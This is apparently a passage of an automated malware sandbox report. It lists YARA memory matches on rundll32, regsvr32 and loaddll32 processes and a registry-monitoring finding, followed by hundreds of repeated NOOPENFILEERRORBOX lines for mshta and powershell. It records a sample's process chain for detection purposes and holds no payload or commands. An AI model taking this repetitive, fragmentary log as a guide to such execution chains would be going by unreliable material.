Source: Yara match	File source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\System32\loaddll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
